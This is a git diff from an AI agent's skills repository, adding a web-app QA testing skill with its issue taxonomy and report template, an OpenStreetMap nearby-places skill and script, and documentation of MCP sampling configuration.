- [asciiflow.com](http://asciiflow.com/) — Interactive ASCII diagram editor (browser)
- [awesome-ascii-art](https://github.com/moul/awesome-ascii-art) — Curated resource list
## Decision Flow
1. **Text as a banner** → pyfiglet (or toilet for colored output)
1. **Text as a banner** → pyfiglet if installed, otherwise asciified API via curl
2. **Wrap a message in fun character art** → cowsay
3. **Add decorative border/frame** → boxes (can combine with pyfiglet)
4. **Art of a thing** (cat, rocket, dragon) → emojicombos.com first, then asciiart.eu
5. **Kaomoji / emoticons** → emojicombos.com (`{term}-kaomoji`)
6. **Convert an image to ASCII** → ascii-image-converter or jp2a
7. **Something custom/creative** → LLM generation with Unicode palette
8. **Any tool not installed** → install it, or fall back to next option
3. **Add decorative border/frame** → boxes (can combine with pyfiglet/asciified)
4. **Art of a specific thing** (cat, rocket, dragon) → ascii.co.uk via curl + parsing
5. **Convert an image to ASCII** → ascii-image-converter or jp2a
6. **QR code** → qrenco.de via curl
7. **Weather/moon art** → wttr.in via curl
8. **Something custom/creative** → LLM generation with Unicode palette
9. **Any tool not installed** → install it, or fall back to next option

162
skills/dogfood/SKILL.md Normal file
View File

@@ -0,0 +1,162 @@
---
name: dogfood
description: Systematic exploratory QA testing of web applications — find bugs, capture evidence, and generate structured reports
version: 1.0.0
metadata:
hermes:
tags: [qa, testing, browser, web, dogfood]
related_skills: []
---
# Dogfood: Systematic Web Application QA Testing
## Overview
This skill guides you through systematic exploratory QA testing of web applications using the browser toolset. You will navigate the application, interact with elements, capture evidence of issues, and produce a structured bug report.
## Prerequisites
- Browser toolset must be available (`browser_navigate`, `browser_snapshot`, `browser_click`, `browser_type`, `browser_vision`, `browser_console`, `browser_scroll`, `browser_back`, `browser_press`, `browser_close`)
- A target URL and testing scope from the user
## Inputs
The user provides:
1. **Target URL** — the entry point for testing
2. **Scope** — what areas/features to focus on (or "full site" for comprehensive testing)
3. **Output directory** (optional) — where to save screenshots and the report (default: `./dogfood-output`)
## Workflow
Follow this 5-phase systematic workflow:
### Phase 1: Plan
1. Create the output directory structure:
```
{output_dir}/
├── screenshots/ # Evidence screenshots
└── report.md # Final report (generated in Phase 5)
```
2. Identify the testing scope based on user input.
3. Build a rough sitemap by planning which pages and features to test:
- Landing/home page
- Navigation links (header, footer, sidebar)
- Key user flows (sign up, login, search, checkout, etc.)
- Forms and interactive elements
- Edge cases (empty states, error pages, 404s)
### Phase 2: Explore
For each page or feature in your plan:
1. **Navigate** to the page:
```
browser_navigate(url="https://example.com/page")
```
2. **Take a snapshot** to understand the DOM structure:
```
browser_snapshot()
```
3. **Check the console** for JavaScript errors:
```
browser_console(clear=true)
```
Do this after every navigation and after every significant interaction. Silent JS errors are high-value findings.
4. **Take an annotated screenshot** to visually assess the page and identify interactive elements:
```
browser_vision(question="Describe the page layout, identify any visual issues, broken elements, or accessibility concerns", annotate=true)
```
The `annotate=true` flag overlays numbered `[N]` labels on interactive elements. Each `[N]` maps to ref `@eN` for subsequent browser commands.
5. **Test interactive elements** systematically:
- Click buttons and links: `browser_click(ref="@eN")`
- Fill forms: `browser_type(ref="@eN", text="test input")`
- Test keyboard navigation: `browser_press(key="Tab")`, `browser_press(key="Enter")`
- Scroll through content: `browser_scroll(direction="down")`
- Test form validation with invalid inputs
- Test empty submissions
6. **After each interaction**, check for:
- Console errors: `browser_console()`
- Visual changes: `browser_vision(question="What changed after the interaction?")`
- Expected vs actual behavior
### Phase 3: Collect Evidence
For every issue found:
1. **Take a screenshot** showing the issue:
```
browser_vision(question="Capture and describe the issue visible on this page", annotate=false)
```
Save the `screenshot_path` from the response — you will reference it in the report.
2. **Record the details**:
- URL where the issue occurs
- Steps to reproduce
- Expected behavior
- Actual behavior
- Console errors (if any)
- Screenshot path
3. **Classify the issue** using the issue taxonomy (see `references/issue-taxonomy.md`):
- Severity: Critical / High / Medium / Low
- Category: Functional / Visual / Accessibility / Console / UX / Content
### Phase 4: Categorize
1. Review all collected issues.
2. De-duplicate — merge issues that are the same bug manifesting in different places.
3. Assign final severity and category to each issue.
4. Sort by severity (Critical first, then High, Medium, Low).
5. Count issues by severity and category for the executive summary.
### Phase 5: Report
Generate the final report using the template at `templates/dogfood-report-template.md`.
The report must include:
1. **Executive summary** with total issue count, breakdown by severity, and testing scope
2. **Per-issue sections** with:
- Issue number and title
- Severity and category badges
- URL where observed
- Description of the issue
- Steps to reproduce
- Expected vs actual behavior
- Screenshot references (use `MEDIA:<screenshot_path>` for inline images)
- Console errors if relevant
3. **Summary table** of all issues
4. **Testing notes** — what was tested, what was not, any blockers
Save the report to `{output_dir}/report.md`.
## Tools Reference
| Tool | Purpose |
|------|---------|
| `browser_navigate` | Go to a URL |
| `browser_snapshot` | Get DOM text snapshot (accessibility tree) |
| `browser_click` | Click an element by ref (`@eN`) or text |
| `browser_type` | Type into an input field |
| `browser_scroll` | Scroll up/down on the page |
| `browser_back` | Go back in browser history |
| `browser_press` | Press a keyboard key |
| `browser_vision` | Screenshot + AI analysis; use `annotate=true` for element labels |
| `browser_console` | Get JS console output and errors |
| `browser_close` | Close the browser session |
## Tips
- **Always check `browser_console()` after navigating and after significant interactions.** Silent JS errors are among the most valuable findings.
- **Use `annotate=true` with `browser_vision`** when you need to reason about interactive element positions or when the snapshot refs are unclear.
- **Test with both valid and invalid inputs** — form validation bugs are common.
- **Scroll through long pages** — content below the fold may have rendering issues.
- **Test navigation flows** — click through multi-step processes end-to-end.
- **Check responsive behavior** by noting any layout issues visible in screenshots.
- **Don't forget edge cases**: empty states, very long text, special characters, rapid clicking.
- When reporting screenshots to the user, include `MEDIA:<screenshot_path>` so they can see the evidence inline.

View File

@@ -0,0 +1,109 @@
# Issue Taxonomy
Use this taxonomy to classify issues found during dogfood QA testing.
## Severity Levels
### Critical
The issue makes a core feature completely unusable or causes data loss.
**Examples:**
- Application crashes or shows a blank white page
- Form submission silently loses user data
- Authentication is completely broken (can't log in at all)
- Payment flow fails and charges the user without completing the order
- Security vulnerability (e.g., XSS, exposed credentials in console)
### High
The issue significantly impairs functionality but a workaround may exist.
**Examples:**
- A key button does nothing when clicked (but refreshing fixes it)
- Search returns no results for valid queries
- Form validation rejects valid input
- Page loads but critical content is missing or garbled
- Navigation link leads to a 404 or wrong page
- Uncaught JavaScript exceptions in the console on core pages
### Medium
The issue is noticeable and affects user experience but doesn't block core functionality.
**Examples:**
- Layout is misaligned or overlapping on certain screen sections
- Images fail to load (broken image icons)
- Slow performance (visible loading delays > 3 seconds)
- Form field lacks proper validation feedback (no error message on bad input)
- Console warnings that suggest deprecated or misconfigured features
- Inconsistent styling between similar pages
### Low
Minor polish issues that don't affect functionality.
**Examples:**
- Typos or grammatical errors in text content
- Minor spacing or alignment inconsistencies
- Placeholder text left in production ("Lorem ipsum")
- Favicon missing
- Console info/debug messages that shouldn't be in production
- Subtle color contrast issues that don't fail WCAG requirements
## Categories
### Functional
Issues where features don't work as expected.
- Buttons/links that don't respond
- Forms that don't submit or submit incorrectly
- Broken user flows (can't complete a multi-step process)
- Incorrect data displayed
- Features that work partially
### Visual
Issues with the visual presentation of the page.
- Layout problems (overlapping elements, broken grids)
- Broken images or missing media
- Styling inconsistencies
- Responsive design failures
- Z-index issues (elements hidden behind others)
- Text overflow or truncation
### Accessibility
Issues that prevent or hinder access for users with disabilities.
- Missing alt text on meaningful images
- Poor color contrast (fails WCAG AA)
- Elements not reachable via keyboard navigation
- Missing form labels or ARIA attributes
- Focus indicators missing or unclear
- Screen reader incompatible content
### Console
Issues detected through JavaScript console output.
- Uncaught exceptions and unhandled promise rejections
- Failed network requests (4xx, 5xx errors in console)
- Deprecation warnings
- CORS errors
- Mixed content warnings (HTTP resources on HTTPS page)
- Excessive console.log output left from development
### UX (User Experience)
Issues where functionality works but the experience is poor.
- Confusing navigation or information architecture
- Missing loading indicators (user doesn't know something is happening)
- No feedback after user actions (e.g., button click with no visible result)
- Inconsistent interaction patterns
- Missing confirmation dialogs for destructive actions
- Poor error messages that don't help the user recover
### Content
Issues with the text, media, or information on the page.
- Typos and grammatical errors
- Placeholder/dummy content in production
- Outdated information
- Missing content (empty sections)
- Broken or dead links to external resources
- Incorrect or misleading labels

View File

@@ -0,0 +1,86 @@
# Dogfood QA Report
**Target:** {target_url}
**Date:** {date}
**Scope:** {scope_description}
**Tester:** Hermes Agent (automated exploratory QA)
---
## Executive Summary
| Severity | Count |
|----------|-------|
| 🔴 Critical | {critical_count} |
| 🟠 High | {high_count} |
| 🟡 Medium | {medium_count} |
| 🔵 Low | {low_count} |
| **Total** | **{total_count}** |
**Overall Assessment:** {one_sentence_assessment}
---
## Issues
<!-- Repeat this section for each issue found, sorted by severity (Critical first) -->
### Issue #{issue_number}: {issue_title}
| Field | Value |
|-------|-------|
| **Severity** | {severity} |
| **Category** | {category} |
| **URL** | {url_where_found} |
**Description:**
{detailed_description_of_the_issue}
**Steps to Reproduce:**
1. {step_1}
2. {step_2}
3. {step_3}
**Expected Behavior:**
{what_should_happen}
**Actual Behavior:**
{what_actually_happens}
**Screenshot:**
MEDIA:{screenshot_path}
**Console Errors** (if applicable):
```
{console_error_output}
```
---
<!-- End of per-issue section -->
## Issues Summary Table
| # | Title | Severity | Category | URL |
|---|-------|----------|----------|-----|
| {n} | {title} | {severity} | {category} | {url} |
## Testing Coverage
### Pages Tested
- {list_of_pages_visited}
### Features Tested
- {list_of_features_exercised}
### Not Tested / Out of Scope
- {areas_not_covered_and_why}
### Blockers
- {any_issues_that_prevented_testing_certain_areas}
---
## Notes
{any_additional_observations_or_recommendations}

View File

@@ -0,0 +1,69 @@
---
name: find-nearby
description: Find nearby places (restaurants, cafes, bars, pharmacies, etc.) using OpenStreetMap. Works with coordinates, addresses, cities, zip codes, or Telegram location pins. No API keys needed.
version: 1.0.0
metadata:
hermes:
tags: [location, maps, nearby, places, restaurants, local]
related_skills: []
---
# Find Nearby — Local Place Discovery
Find restaurants, cafes, bars, pharmacies, and other places near any location. Uses OpenStreetMap (free, no API keys). Works with:
- **Coordinates** from Telegram location pins (latitude/longitude in conversation)
- **Addresses** ("near 123 Main St, Springfield")
- **Cities** ("restaurants in downtown Austin")
- **Zip codes** ("pharmacies near 90210")
- **Landmarks** ("cafes near Times Square")
## Quick Reference
```bash
# By coordinates (from Telegram location pin or user-provided)
python3 SKILL_DIR/scripts/find_nearby.py --lat <LAT> --lon <LON> --type restaurant --radius 1500
# By address, city, or landmark (auto-geocoded)
python3 SKILL_DIR/scripts/find_nearby.py --near "Times Square, New York" --type cafe
# Multiple place types
python3 SKILL_DIR/scripts/find_nearby.py --near "downtown austin" --type restaurant --type bar --limit 10
# JSON output
python3 SKILL_DIR/scripts/find_nearby.py --near "90210" --type pharmacy --json
```
### Parameters
| Flag | Description | Default |
|------|-------------|---------|
| `--lat`, `--lon` | Exact coordinates | — |
| `--near` | Address, city, zip, or landmark (geocoded) | — |
| `--type` | Place type (repeatable for multiple) | restaurant |
| `--radius` | Search radius in meters | 1500 |
| `--limit` | Max results | 15 |
| `--json` | Machine-readable JSON output | off |
### Common Place Types
`restaurant`, `cafe`, `bar`, `pub`, `fast_food`, `pharmacy`, `hospital`, `bank`, `atm`, `fuel`, `parking`, `supermarket`, `convenience`, `hotel`
## Workflow
1. **Get the location.** Look for coordinates (`latitude: ... / longitude: ...`) from a Telegram pin, or ask the user for an address/city/zip.
2. **Ask for preferences** (only if not already stated): place type, how far they're willing to go, any specifics (cuisine, "open now", etc.).
3. **Run the script** with appropriate flags. Use `--json` if you need to process results programmatically.
4. **Present results** with names, distances, and Google Maps links. If the user asked about hours or "open now," check the `hours` field in results — if missing or unclear, verify with `web_search`.
5. **For directions**, use the `directions_url` from results, or construct: `https://www.google.com/maps/dir/?api=1&origin=<LAT>,<LON>&destination=<LAT>,<LON>`
## Tips
- If results are sparse, widen the radius (1500 → 3000m)
- For "open now" requests: check the `hours` field in results, cross-reference with `web_search` for accuracy since OSM hours aren't always complete
- Zip codes alone can be ambiguous globally — prompt the user for country/state if results look wrong
- The script uses OpenStreetMap data which is community-maintained; coverage varies by region

View File

@@ -0,0 +1,184 @@
#!/usr/bin/env python3
"""Find nearby places using OpenStreetMap (Overpass + Nominatim). No API keys needed.
Usage:
# By coordinates
python find_nearby.py --lat 36.17 --lon -115.14 --type restaurant --radius 1500
# By address/city/zip (auto-geocoded)
python find_nearby.py --near "Times Square, New York" --type cafe --radius 1000
python find_nearby.py --near "90210" --type pharmacy
# Multiple types
python find_nearby.py --lat 36.17 --lon -115.14 --type restaurant --type bar
# JSON output for programmatic use
python find_nearby.py --near "downtown las vegas" --type restaurant --json
"""
import argparse
import json
import math
import sys
import urllib.parse
import urllib.request
from typing import Any
OVERPASS_URLS = [
"https://overpass-api.de/api/interpreter",
"https://overpass.kumi.systems/api/interpreter",
]
NOMINATIM_URL = "https://nominatim.openstreetmap.org/search"
USER_AGENT = "HermesAgent/1.0 (find-nearby skill)"
TIMEOUT = 15
def _http_get(url: str) -> Any:
req = urllib.request.Request(url, headers={"User-Agent": USER_AGENT})
with urllib.request.urlopen(req, timeout=TIMEOUT) as r:
return json.loads(r.read())
def _http_post(url: str, data: str) -> Any:
req = urllib.request.Request(
url, data=data.encode(), headers={"User-Agent": USER_AGENT}
)
with urllib.request.urlopen(req, timeout=TIMEOUT) as r:
return json.loads(r.read())
def haversine(lat1: float, lon1: float, lat2: float, lon2: float) -> float:
"""Distance in meters between two coordinates."""
R = 6_371_000
rlat1, rlat2 = math.radians(lat1), math.radians(lat2)
dlat = math.radians(lat2 - lat1)
dlon = math.radians(lon2 - lon1)
a = math.sin(dlat / 2) ** 2 + math.cos(rlat1) * math.cos(rlat2) * math.sin(dlon / 2) ** 2
return R * 2 * math.atan2(math.sqrt(a), math.sqrt(1 - a))
def geocode(query: str) -> tuple[float, float]:
"""Convert address/city/zip to coordinates via Nominatim."""
params = urllib.parse.urlencode({"q": query, "format": "json", "limit": 1})
results = _http_get(f"{NOMINATIM_URL}?{params}")
if not results:
print(f"Error: Could not geocode '{query}'. Try a more specific address.", file=sys.stderr)
sys.exit(1)
return float(results[0]["lat"]), float(results[0]["lon"])
def find_nearby(lat: float, lon: float, types: list[str], radius: int = 1500, limit: int = 15) -> list[dict]:
"""Query Overpass for nearby amenities."""
# Build Overpass QL query
type_filters = "".join(
f'nwr["amenity"="{t}"](around:{radius},{lat},{lon});' for t in types
)
query = f"[out:json][timeout:{TIMEOUT}];({type_filters});out center tags;"
# Try each Overpass server
data = None
for url in OVERPASS_URLS:
try:
data = _http_post(url, f"data={urllib.parse.quote(query)}")
break
except Exception:
continue
if not data:
return []
# Parse results
places = []
for el in data.get("elements", []):
tags = el.get("tags", {})
name = tags.get("name")
if not name:
continue
# Get coordinates (nodes have lat/lon directly, ways/relations use center)
plat = el.get("lat") or (el.get("center", {}) or {}).get("lat")
plon = el.get("lon") or (el.get("center", {}) or {}).get("lon")
if not plat or not plon:
continue
dist = haversine(lat, lon, plat, plon)
place = {
"name": name,
"type": tags.get("amenity", ""),
"distance_m": round(dist),
"lat": plat,
"lon": plon,
"maps_url": f"https://www.google.com/maps/search/?api=1&query={plat},{plon}",
"directions_url": f"https://www.google.com/maps/dir/?api=1&origin={lat},{lon}&destination={plat},{plon}",
}
# Add useful optional fields
if tags.get("cuisine"):
place["cuisine"] = tags["cuisine"]
if tags.get("opening_hours"):
place["hours"] = tags["opening_hours"]
if tags.get("phone"):
place["phone"] = tags["phone"]
if tags.get("website"):
place["website"] = tags["website"]
if tags.get("addr:street"):
addr_parts = [tags.get("addr:housenumber", ""), tags.get("addr:street", "")]
if tags.get("addr:city"):
addr_parts.append(tags["addr:city"])
place["address"] = " ".join(p for p in addr_parts if p)
places.append(place)
# Sort by distance, limit results
places.sort(key=lambda p: p["distance_m"])
return places[:limit]
def main():
parser = argparse.ArgumentParser(description="Find nearby places via OpenStreetMap")
parser.add_argument("--lat", type=float, help="Latitude")
parser.add_argument("--lon", type=float, help="Longitude")
parser.add_argument("--near", type=str, help="Address, city, or zip code (geocoded automatically)")
parser.add_argument("--type", action="append", dest="types", default=[], help="Place type (restaurant, cafe, bar, pharmacy, etc.)")
parser.add_argument("--radius", type=int, default=1500, help="Search radius in meters (default: 1500)")
parser.add_argument("--limit", type=int, default=15, help="Max results (default: 15)")
parser.add_argument("--json", action="store_true", dest="json_output", help="Output as JSON")
args = parser.parse_args()
# Resolve coordinates
if args.near:
lat, lon = geocode(args.near)
elif args.lat is not None and args.lon is not None:
lat, lon = args.lat, args.lon
else:
print("Error: Provide --lat/--lon or --near", file=sys.stderr)
sys.exit(1)
if not args.types:
args.types = ["restaurant"]
places = find_nearby(lat, lon, args.types, args.radius, args.limit)
if args.json_output:
print(json.dumps({"origin": {"lat": lat, "lon": lon}, "results": places, "count": len(places)}, indent=2))
else:
if not places:
print(f"No {'/'.join(args.types)} found within {args.radius}m")
return
print(f"Found {len(places)} places within {args.radius}m:\n")
for i, p in enumerate(places, 1):
dist_str = f"{p['distance_m']}m" if p["distance_m"] < 1000 else f"{p['distance_m']/1000:.1f}km"
print(f" {i}. {p['name']} ({p['type']}) — {dist_str}")
if p.get("cuisine"):
print(f" Cuisine: {p['cuisine']}")
if p.get("hours"):
print(f" Hours: {p['hours']}")
if p.get("address"):
print(f" Address: {p['address']}")
print(f" Map: {p['maps_url']}")
print()
if __name__ == "__main__":
main()

View File

@@ -321,6 +321,32 @@ mcp_servers:
All tools from all servers are registered and available simultaneously. Each server's tools are prefixed with its name to avoid collisions.
## Sampling (Server-Initiated LLM Requests)
Hermes supports MCP's `sampling/createMessage` capability — MCP servers can request LLM completions through the agent during tool execution. This enables agent-in-the-loop workflows (data analysis, content generation, decision-making).
Sampling is **enabled by default**. Configure per server:
```yaml
mcp_servers:
my_server:
command: "npx"
args: ["-y", "my-mcp-server"]
sampling:
enabled: true # default: true
model: "gemini-3-flash" # model override (optional)
max_tokens_cap: 4096 # max tokens per request
timeout: 30 # LLM call timeout (seconds)
max_rpm: 10 # max requests per minute
allowed_models: [] # model whitelist (empty = all)
max_tool_rounds: 5 # tool loop limit (0 = disable)
log_level: "info" # audit verbosity
```
Servers can also include `tools` in sampling requests for multi-turn tool-augmented workflows. The `max_tool_rounds` config prevents infinite tool loops. Per-server audit metrics (requests, errors, tokens, tool use count) are tracked via `get_mcp_status()`.
Disable sampling for untrusted servers with `sampling: { enabled: false }`.
## Notes
- MCP tools are called synchronously from the agent's perspective but run asynchronously on a dedicated background event loop

View File

@@ -1 +1,3 @@
Media content extraction and transformation tools — YouTube transcripts, audio, video processing.
---
description: Skills for working with media content — YouTube transcripts, GIF search, music generation, and audio visualization.
---

View File

@@ -0,0 +1,3 @@
---
description: GPU cloud providers and serverless compute platforms for ML workloads.
---

View File

@@ -0,0 +1,3 @@
---
description: Model evaluation benchmarks, experiment tracking, data curation, tokenizers, and interpretability tools.
---

View File

@@ -0,0 +1,3 @@
---
description: Model serving, quantization (GGUF/GPTQ), structured output, inference optimization, and model surgery tools for deploying and running LLMs.
---

Some files were not shown because too many files have changed in this diff Show More